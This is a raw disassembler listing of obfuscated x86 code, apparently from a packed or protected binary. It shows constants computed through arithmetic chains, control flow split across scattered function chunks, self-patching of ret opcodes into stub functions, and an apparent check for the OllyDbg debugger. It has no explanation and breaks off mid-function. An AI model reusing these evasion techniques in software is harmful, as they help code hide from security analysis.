loc_45479A: ; CODE XREF: sub_4462B0:loc_44B256j
pop ecx
ror eax, 1Ch
push ecx
push 4ABC1E0Fh
jmp loc_4390A0
; END OF FUNCTION CHUNK FOR sub_4462B0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_382. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4547AA: ; CODE XREF: sub_4462B0+AF00j
jmp loc_44C57D
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4393B6
loc_4547AF: ; CODE XREF: sub_4393B6+10C75j
jmp loc_4534BC
; END OF FUNCTION CHUNK FOR sub_4393B6
; ---------------------------------------------------------------------------
loc_4547B4: ; CODE XREF: ut7h7i2x:0043B8A9j
sbb ebx, eax
and ebp, 98AE293Ch
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_4547BC: ; CODE XREF: sub_43F1B2:loc_43B894j
add edx, ds:4000F8h
or edx, 0FCCD9A20h
add edx, 273F6D8h
jmp loc_4429C3
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
locret_4547D3: ; CODE XREF: ut7h7i2x:loc_450C68j
retn
; ---------------------------------------------------------------------------
loc_4547D4: ; CODE XREF: ut7h7i2x:loc_454591j
rol eax, 12h
xor eax, 5816568Bh
add eax, 3391464Ah
loc_4547E3: ; CODE XREF: ut7h7i2x:loc_43AB98j
xor eax, 39857FCh
loc_4547E9: ; CODE XREF: ut7h7i2x:00439EE6j
call sub_43AA94
mov ds:dword_41D1B4, eax
lea eax, nullsub_452
mov byte ptr [eax], 0C3h
jmp loc_4494AE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_454803: ; CODE XREF: ut7h7i2x:00452D02j
jmp loc_447613
; ---------------------------------------------------------------------------
loc_454808: ; CODE XREF: ut7h7i2x:0043CCA1j
jmp loc_45A9D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_45480D: ; CODE XREF: sub_4459EE-2FF0j
test eax, 80h
jmp loc_43E659
; END OF FUNCTION CHUNK FOR sub_4459EE
; =============== S U B R O U T I N E =======================================
sub_454818 proc near ; DATA XREF: ut7h7i2x:00442A89o
push 0C305148Dh
pop ecx
rol ecx, 17h
and ecx, 0AE1E8CA5h
jmp loc_44488E
sub_454818 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4516C6
loc_45482C: ; CODE XREF: sub_4516C6:loc_45540Fj
push 0F64B2BD1h
pop ecx
sub ecx, 72479272h
add ecx, 7C40D6F3h
call sub_43D38F
loc_454843: ; CODE XREF: ut7h7i2x:00453D25j
jmp loc_43FE24
; END OF FUNCTION CHUNK FOR sub_4516C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_454848: ; CODE XREF: sub_43F7A5+9697j
jmp loc_44D2DB
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
loc_45484D: ; CODE XREF: ut7h7i2x:0043E493j
push 298ACA20h
sbb ebx, ecx
mov ecx, [edi]
loc_454856: ; CODE XREF: ut7h7i2x:loc_43E487j
push offset sub_452653
jmp loc_451745
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F57E
loc_454860: ; CODE XREF: sub_44F57E+7j
push ecx
push ebx
mov ebx, eax
xchg ebx, [esp+4+var_4]
push edx
and ebx, eax
push ebx
jmp loc_44F713
; END OF FUNCTION CHUNK FOR sub_44F57E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4522DD
loc_454870: ; CODE XREF: sub_4522DD-109D4j
push eax
jg loc_44187B
sub ebx, 7D00EB9Ch
loc_45487D: ; CODE XREF: sub_4522DD-109DEj
rol eax, 0Fh
xor eax, 7D66C3D0h
push offset sub_4457F7
jmp nullsub_523
; END OF FUNCTION CHUNK FOR sub_4522DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_333. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_454891: ; CODE XREF: ut7h7i2x:0044D292j
popf
loc_454892: ; CODE XREF: ut7h7i2x:loc_44D27Fj
or eax, 8B3F8CAFh
rol eax, 0Ah
sub eax, 6ED5703Fh
add eax, 6FA6EFCCh
push offset loc_4446EF
jmp locret_446513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_4548B1: ; CODE XREF: sub_43F0B0:loc_440F7Aj
and ebx, 37DE425Fh
xor ebx, 1864009h
xchg ebx, [esp-4+arg_0]
mov eax, [ebp-8]
push eax
push ebx
push 8FA93959h
jmp loc_443D96
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_4548CF: ; CODE XREF: sub_43FCEE:loc_43D9D2j
; DATA XREF: ut7h7i2x:00449BBCo
pop esi
rol eax, 19h
loc_4548D3: ; CODE XREF: ut7h7i2x:00449CB3j
xor eax, 0E40775Dh
call sub_445AD1
; END OF FUNCTION CHUNK FOR sub_43FCEE
; =============== S U B R O U T I N E =======================================
sub_4548DE proc near ; CODE XREF: ut7h7i2x:00442618j
; ut7h7i2x:0045815Dp
xchg eax, [esp+0]
pop eax
mov ds:dword_44A86C, eax
retn
sub_4548DE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4548E9: ; CODE XREF: ut7h7i2x:004529D4j
jmp loc_44D185
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E26
loc_4548EE: ; CODE XREF: sub_4492A1+920Dj
; sub_453E26+Aj
rol eax, 11h
push eax
retn
; END OF FUNCTION CHUNK FOR sub_453E26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449406
loc_4548F3: ; CODE XREF: sub_449406+11j
jmp loc_44B5E6
; END OF FUNCTION CHUNK FOR sub_449406
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_4548F8: ; CODE XREF: sub_4462B0-6DB7j
jmp loc_453BAA
; END OF FUNCTION CHUNK FOR sub_4462B0
; =============== S U B R O U T I N E =======================================
sub_4548FD proc near ; CODE XREF: ut7h7i2x:loc_455E61p
; sub_43C0DA+1B6CEj
; FUNCTION CHUNK AT 0043CCF9 SIZE 00000005 BYTES
push offset sub_4431FF
jmp loc_43CCF9
sub_4548FD endp
; ---------------------------------------------------------------------------
loc_454907: ; CODE XREF: ut7h7i2x:004570A0j
pop ebp
push 727CFAE3h
pop eax
xor eax, 15E16959h
sub eax, 8AFBA9D4h
jmp loc_43B1EF
; ---------------------------------------------------------------------------
loc_45491F: ; CODE XREF: ut7h7i2x:loc_44639Ej
jnz loc_44149A
shr edx, 14h
not ebx
sbb ebx, esi
xor eax, ecx
jmp loc_45272E
; ---------------------------------------------------------------------------
loc_454933: ; DATA XREF: sub_447E36+2o
pop ecx
lea eax, nullsub_56
mov byte ptr [eax], 0C3h
jmp loc_457588
; ---------------------------------------------------------------------------
xchg eax, [esp]
mov edx, eax
pop eax
mov eax, [esp]
jmp loc_43CEF3
; ---------------------------------------------------------------------------
loc_454950: ; DATA XREF: sub_43F7B6+8CCFo
mov eax, [ebp-8]
mov byte ptr [eax], 0
mov esp, ebp
pop ebp
jmp loc_440A67
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_519. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45495F: ; CODE XREF: ut7h7i2x:0044FC06j
jmp loc_44C7E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_454964: ; CODE XREF: sub_45A79F:loc_443058j
jz loc_43D254
jmp loc_43C2B1
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_45496F: ; CODE XREF: sub_444374:loc_4552BEj
mov esp, ebp
pop ebp
mov eax, ds:dword_44A87C
or eax, eax
jnz loc_4540B9
jmp loc_452430
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_454985: ; CODE XREF: sub_44917B-A5ABj
; sub_444EAA+11D0Cj
or ecx, 8A521E33h
jnz loc_451B54
shr edi, 1
jnz loc_440984
jmp loc_44062B
; END OF FUNCTION CHUNK FOR sub_44917B
; =============== S U B R O U T I N E =======================================
sub_45499E proc near ; CODE XREF: sub_445EDA-B365p
; ut7h7i2x:004412E4p ...
; FUNCTION CHUNK AT 0045594C SIZE 00000005 BYTES
push offset sub_43ABD1
jmp loc_45594C
sub_45499E endp
; ---------------------------------------------------------------------------
loc_4549A8: ; CODE XREF: ut7h7i2x:00446DC5j
mov edx, eax
xchg edx, [esp]
ror eax, 0Ch
call sub_448CED
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_4549B5: ; CODE XREF: sub_44B5CF-5B48j
jmp loc_4507CB
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
loc_4549BA: ; CODE XREF: ut7h7i2x:004422EBj
jmp loc_450313
; ---------------------------------------------------------------------------
loc_4549BF: ; CODE XREF: ut7h7i2x:0043D735j
jge loc_439618
; START OF FUNCTION CHUNK FOR sub_44261F
loc_4549C5: ; CODE XREF: sub_44261F+17E8Cj
jmp loc_44A92C
; END OF FUNCTION CHUNK FOR sub_44261F
; ---------------------------------------------------------------------------
loc_4549CA: ; CODE XREF: ut7h7i2x:00448912j
jmp loc_454090
; ---------------------------------------------------------------------------
adc ebp, ecx
add ebp, 6571FCF7h
jmp loc_439618
; ---------------------------------------------------------------------------
mov ds:off_41D000, eax
lea eax, loc_442B2C
mov byte ptr [eax], 0C3h
jmp loc_442B2C
; =============== S U B R O U T I N E =======================================
sub_4549F0 proc near ; CODE XREF: sub_41764F+1Dp
; sub_417722+1Bp
; DATA XREF: ...
; FUNCTION CHUNK AT 0043970E SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043CC20 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043F88E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FA37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FAE7 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004400BA SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00446819 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446FDF SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044719A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044814C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE80 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F81F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F9ED SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045067A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453257 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004536E5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045419E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456275 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004578B5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A9A7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045AA31 SIZE 0000000B BYTES
js loc_45A9A7
push 8E5D3032h
pop eax
jmp loc_446819
sub_4549F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_454A01: ; CODE XREF: sub_44AA54-44F3j
add eax, 9555B8D0h
xor eax, 0D11924Eh
or eax, 0F3E56E07h
xor eax, 28CB1E13h
add eax, ebp
call sub_44ADE5
; END OF FUNCTION CHUNK FOR sub_44AA54
; =============== S U B R O U T I N E =======================================
sub_454A20 proc near ; CODE XREF: sub_4055D9+2Bp
; sub_454A20+5j
; DATA XREF: ...
call sub_454A2B
jmp ds:off_41D174
sub_454A20 endp
; =============== S U B R O U T I N E =======================================
sub_454A2B proc near ; CODE XREF: sub_455EC1:loc_44998Dj
; sub_454A20p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043BBCF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FC86 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004451D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004486FE SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044B6DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F03 SIZE 0000001F BYTES
jo loc_455F11
pop edx
jmp loc_44B6DB
sub_454A2B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_454A37: ; CODE XREF: ut7h7i2x:0044FB12j
or esi, 82D41169h
js loc_43B3C5
; START OF FUNCTION CHUNK FOR sub_45967C
loc_454A43: ; CODE XREF: sub_45967C-11AB2j
jmp nullsub_24
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
loc_454A48: ; CODE XREF: ut7h7i2x:00439827j
jmp locret_45717B
; ---------------------------------------------------------------------------
shr ecx, 0Ch
and eax, esi
jmp loc_43A0A9
; ---------------------------------------------------------------------------
mov eax, 637A7446h
push esi
push 0FD380B74h
pop esi
rol esi, 9
sub esi, 57C9B37Dh
jmp loc_458EC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_454A71: ; CODE XREF: sub_44B72F-C39j
call sub_444029
; END OF FUNCTION CHUNK FOR sub_44B72F
; START OF FUNCTION CHUNK FOR sub_449FD5
loc_454A76: ; CODE XREF: sub_449FD5+9j
xchg edi, [esp+4+var_4]
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_450F82
; END OF FUNCTION CHUNK FOR sub_449FD5
; ---------------------------------------------------------------------------
test al, al
jz loc_443254
jmp loc_45227C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_454A90: ; CODE XREF: sub_44E5DC:loc_441526j
push 0A0E03634h
pop eax
add eax, 70D1FE01h
and eax, 0C2251B6Bh
xor eax, 283367D0h
jnz loc_455FD8
loc_454AAE: ; CODE XREF: sub_455E0B-E05Fj
jmp loc_446BDB
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
shl eax, 13h
loc_454AB6: ; CODE XREF: ut7h7i2x:loc_44D2A4j
jmp loc_44C0D8
; =============== S U B R O U T I N E =======================================
sub_454ABB proc near ; CODE XREF: ut7h7i2x:0043A322p
; sub_43A2F5+35D0p ...
; FUNCTION CHUNK AT 00442F77 SIZE 0000000D BYTES
jo sub_453139
push ebp
mov ebp, esp
call nullsub_19
push 0F028FC62h
jmp loc_442F77
sub_454ABB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_454AD3 proc near ; CODE XREF: sub_458CBB-6E61j
retn
sub_454AD3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_454AD4: ; CODE XREF: sub_44EC11+4A00j
jmp nullsub_338
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454AFE
loc_454AD9: ; CODE XREF: sub_454AFE:loc_44DD91j
; sub_454AFE-6D5Ej
add ebx, 51266C2Ah
call sub_450324
loc_454AE4: ; DATA XREF: sub_442A4D+CF96o
mov byte ptr [eax], 0C3h
jmp loc_454626
; END OF FUNCTION CHUNK FOR sub_454AFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_454AEC: ; CODE XREF: sub_446F56:loc_454626j
xchg edi, [esp+4+var_4]
mov edx, edi
adc edi, eax
jmp loc_442479
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
loc_454AF8: ; CODE XREF: ut7h7i2x:loc_44967Bj
; ut7h7i2x:00453709j
xor ebx, 8299BC6Dh
; =============== S U B R O U T I N E =======================================
sub_454AFE proc near ; CODE XREF: sub_44AA33+1p
; FUNCTION CHUNK AT 0044DD91 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454AD9 SIZE 00000013 BYTES
xchg esi, [esp+0]
pop esi
push 0C912DA60h
pop ebx
sub ebx, 19F3DFC0h
test ebx, 80000h
jmp loc_44DD91
sub_454AFE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_454B19: ; CODE XREF: sub_444029+1D85j
pop ebp
shr ebx, 3
jz loc_450420
shl ebp, 0Ch
jmp loc_457795
; END OF FUNCTION CHUNK FOR sub_444029
; =============== S U B R O U T I N E =======================================
sub_454B2B proc near ; DATA XREF: sub_44A3BB:loc_4463A3o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439809 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00439BEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043A852 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043AFD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BCFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EB01 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043F818 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044370A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044A9A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B26A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E213 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045025D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452B29 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00453016 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00455D85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004583FD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A08B SIZE 0000001A BYTES
mov eax, [ebp-4]
mov eax, [eax]
push eax
mov eax, ebp
jmp loc_44A9A7
sub_454B2B endp
; ---------------------------------------------------------------------------
jmp ds:off_41D11C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_454B3E: ; CODE XREF: sub_44AA33-FB24j
; sub_44EB88+1E59j ...
jnb loc_44A965
pop edx
mov eax, [esp-14h+arg_10]
push eax
jmp loc_454F45
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
mov eax, 0F2B89A19h
call sub_43AA94
mov ds:off_41D090, eax
lea eax, sub_4593AA
mov byte ptr [eax], 0C3h
jmp loc_44687C
; =============== S U B R O U T I N E =======================================
sub_454B6C proc near ; CODE XREF: sub_4147FF+8p
; sub_454B6C:loc_44E5A0j
; DATA XREF: ...
; FUNCTION CHUNK AT 00445272 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E5A0 SIZE 00000006 BYTES
call sub_44E5AB
jmp loc_445272
sub_454B6C endp
; ---------------------------------------------------------------------------
loc_454B76: ; CODE XREF: ut7h7i2x:0044CD08j
call sub_44A6AF
; START OF FUNCTION CHUNK FOR sub_43D45D
loc_454B7B: ; CODE XREF: sub_43D45D+18j
jmp nullsub_490
; END OF FUNCTION CHUNK FOR sub_43D45D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4522DD
loc_454B80: ; CODE XREF: sub_4522DD+9j
xchg ecx, [esp+0]
push ebp
mov ebp, eax
xchg ebp, [esp+4+var_4]
push 6441AE66h
pop eax
or eax, 45358FBBh
jmp loc_45308A
; END OF FUNCTION CHUNK FOR sub_4522DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_454B9A: ; CODE XREF: sub_45967C:loc_43BB51j
cmp byte ptr [eax], 0F1h
jnz loc_44CD58
jmp loc_44B471
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_454BA8: ; CODE XREF: sub_43DD17+19442j
xchg edx, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_454BB0: ; CODE XREF: sub_44F738-136DBj
pop ebx
add ebx, 97DFB415h
and ebx, ds:4000F7h
xor ebx, 4D9B5799h
add ebx, 72A913E7h
mov [ebx], eax
jmp loc_4524B9
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
locret_454BD0: ; CODE XREF: ut7h7i2x:loc_44AA3Ej
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_454BD1: ; CODE XREF: sub_445AD1+B479j
jmp loc_44C8DC
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_454BD6: ; CODE XREF: sub_44B789:loc_441233j
jmp loc_450F96
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_454BDB: ; CODE XREF: sub_43AB62+1CEj
jmp loc_44DBE0
; END OF FUNCTION CHUNK FOR sub_43AB62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE31
loc_454BE1: ; CODE XREF: sub_43AE31+8j
jmp sub_44ED9F
; END OF FUNCTION CHUNK FOR sub_43AE31
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459E7A
loc_454BE6: ; CODE XREF: sub_459E7A:loc_44434Cj
pop ebx
or ebx, 3BA92CC3h
add ebx, 2F477717h
xor eax, ebx
pop ebx
push edi
jmp loc_445973
; END OF FUNCTION CHUNK FOR sub_459E7A
; ---------------------------------------------------------------------------
dd 0BDD78A0Fh, 0BFE9FFFFh, 23FFFF5Bh, 0CFE99DCFh
db 0F7h, 0FEh, 0FFh
; ---------------------------------------------------------------------------
loc_454C0F: ; CODE XREF: ut7h7i2x:0044BB3Ej
ja loc_445112
; =============== S U B R O U T I N E =======================================
sub_454C15 proc near ; CODE XREF: sub_440CEC+92B5p
xchg ecx, [esp+0]
pop ecx
and ecx, ebx
jmp loc_44B61A
sub_454C15 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_454C20 proc near ; DATA XREF: sub_4447B8+7o
var_8 = dword ptr -8
push eax
call sub_440493
push edx
mov edx, eax
xchg edx, [esp+8+var_8]
call sub_441FAC
call sub_4524FE
sub_454C20 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_443B9F
loc_454C36: ; CODE XREF: sub_443B9F+7j
jmp nullsub_201
; END OF FUNCTION CHUNK FOR sub_443B9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_454C3B: ; CODE XREF: sub_44E5DC-FB13j
jmp loc_4435F5
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4447C9
loc_454C40: ; CODE XREF: sub_4447C9+Fj
jnz loc_455B1E
jmp loc_45013B
; END OF FUNCTION CHUNK FOR sub_4447C9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_562. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push edx
jmp sub_44AAA2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454700
loc_454C52: ; CODE XREF: sub_454700+19j
add eax, edx
mov eax, [eax]
add eax, [ebp-4]
mov [ebp-0Ch], eax
; END OF FUNCTION CHUNK FOR sub_454700
; START OF FUNCTION CHUNK FOR sub_439788
loc_454C5C: ; CODE XREF: sub_439788+4j
; sub_4474B1-6BF5j ...
mov eax, [ebp-0Ch]
call sub_447718
jge loc_458F74
jmp sub_444A86
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1D2
loc_454C6F: ; CODE XREF: sub_43C1D2+D66Aj
push edi
mov edi, ecx
xchg edi, [esp+4+var_4]
pushf
push 85DFB1C4h
jmp loc_439195
; END OF FUNCTION CHUNK FOR sub_43C1D2
; ---------------------------------------------------------------------------
or ebp, ebx
loc_454C82: ; CODE XREF: ut7h7i2x:00447C11j
push 0C5717646h
jmp sub_4423C1
; =============== S U B R O U T I N E =======================================
sub_454C8C proc near ; CODE XREF: sub_4462B0:loc_43BE79j
; ut7h7i2x:00444341j ...
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 004426A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045233B SIZE 00000016 BYTES
xchg ebx, [esp-8+arg_4]
pop ebx
pushf
push 93688880h
jmp loc_4426A2
sub_454C8C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_454C9B: ; CODE XREF: sub_43AED9:loc_43AFF3j
push eax
push eax
mov edx, eax
call sub_43F058
jmp sub_43946A
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
mov eax, 0EA3AEDBCh
call sub_43AED9
mov ds:off_41D048, eax
lea eax, sub_45A907
jmp loc_457B69
; ---------------------------------------------------------------------------
loc_454CC4: ; DATA XREF: sub_43E944+5o
mov al, [ebp-0Bh]
mov ecx, 8
sub ecx, eax
xor eax, eax
mov al, [ebp-9]
shl eax, cl
mov cl, [ebp-0Bh]
jmp loc_457C4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_454CDD: ; CODE XREF: sub_45410C-15967j
jz loc_4474F8
jns loc_44E976
and eax, 774223F5h
jmp loc_443D12
; END OF FUNCTION CHUNK FOR sub_45410C
; ---------------------------------------------------------------------------
jg loc_45462C
jmp sub_44DD56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD08
loc_454CFF: ; CODE XREF: sub_43CD08+AF3j
sub edx, 3F47701Bh
or edx, 0FCEEAC7Dh
xor edx, 0DACA3A97h
sub edx, 83FADBF3h
jmp loc_44C863
; END OF FUNCTION CHUNK FOR sub_43CD08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_454D1C: ; CODE XREF: sub_447EB5:loc_43A075j
add ebx, 7ACF10D4h
mov [ebx], eax
push offset loc_441792
jmp nullsub_347
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45742F
loc_454D2E: ; CODE XREF: sub_45742F-E9D8j
pop edx
mov edx, [esp-0Ch+arg_8]
push edi
mov edi, eax
xchg edi, [esp-8+arg_4]
mov eax, edx
call sub_44C273
mov eax, [esp-8+arg_4]
jmp loc_447505
; END OF FUNCTION CHUNK FOR sub_45742F
; ---------------------------------------------------------------------------
loc_454D47: ; CODE XREF: ut7h7i2x:loc_44E1E9j
call sub_447B48
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_454D4C: ; CODE XREF: sub_43B7F7+B5A2j
jmp loc_44E50A
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_454D51: ; CODE XREF: sub_4565B2-12F6Aj
jmp loc_453C6D
; END OF FUNCTION CHUNK FOR sub_4565B2
; ---------------------------------------------------------------------------
loc_454D56: ; CODE XREF: ut7h7i2x:0043B3DBj
jmp loc_4443FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_454D5B: ; CODE XREF: sub_43CE34+1B2A7j
add edx, 599C79F9h
jmp loc_4458AA
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_454D66: ; CODE XREF: sub_44937E-DD17j
lea eax, nullsub_20
mov byte ptr [eax], 0C3h
jmp loc_447DD6
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
loc_454D74: ; CODE XREF: ut7h7i2x:0043F541j
xchg ecx, [esp]
mov edx, ecx
pop ecx
mov eax, [esp]
jmp loc_455FB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E9E
loc_454D82: ; CODE XREF: sub_445E9E:loc_44A13Ej
jnz loc_44574A
; END OF FUNCTION CHUNK FOR sub_445E9E
; START OF FUNCTION CHUNK FOR sub_45601B
loc_454D88: ; CODE XREF: sub_45601B+3A1Bj
jmp loc_44F075
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_454D8D: ; CODE XREF: sub_450FDE-C82Dj
jmp loc_448F7A
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
cdq
pop esi
pushf
sub ebp, edi
jmp loc_445747
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_454D9C: ; CODE XREF: sub_443A45-13F8j
js loc_44D0DA
jle loc_43A51A
shr edi, 0Dh
mov [ebp+0], ebx
loc_454DAE: ; CODE XREF: sub_443A45:loc_444AC1j
lea eax, [ebp-2BBh]
cmp dword ptr [eax], 4742444Fh
jz loc_456EB1
jmp loc_43B46D
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
loc_454DC5: ; CODE XREF: ut7h7i2x:loc_4568C2j
call sub_44DA5B
